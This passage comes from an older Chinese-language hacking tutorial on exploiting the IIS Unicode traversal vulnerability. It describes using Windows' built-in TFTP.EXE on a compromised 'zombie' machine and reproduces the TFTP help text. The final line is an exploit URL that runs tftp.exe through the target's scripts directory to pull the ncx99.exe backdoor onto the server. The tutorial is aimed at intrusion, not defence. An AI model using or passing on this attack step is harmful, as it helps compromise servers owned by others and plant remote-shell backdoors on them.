六、unicode编码漏洞提高篇(续)
4、TFTP运用
关于TFTP的运用我们在全攻略-5里面的工具介绍中介绍过,那工具可以在WIN9X
或者NT、WIN2K下执行,前提条件是需要你在本机上安装PERL服务器程序,这对
于一般的爱好者来说稍微有点困难。
实际上如果你是使用NT系统或者你拥有一台NT肉机的话,就可以使用WINNT\SYSTEM32
下的TFTP.EXE这个软件了。
tftp/?
Transfers files to and from a remote computer running the TFTP service.
TFTP [-i] host [GET | PUT] source [destination]
-i Specifies binary image transfer mode (also called
octet). In binary image mode the file is moved
literally, byte by byte. Use this mode when
transferring binary files.
host Specifies the local or remote host.
GET Transfers the file destination on the remote host to
the file source on the local host.
PUT Transfers the file source on the local host to
the file destination on the remote host.
source Specifies the file to transfer.
destination Specifies where to transfer the file.
帮助是英文的,自己翻译吧。
在UNICODE上的命令代码:
http://x.x.x.x/scripts/tftp.exe?-i+127.0.0.1+get+ncx99.exe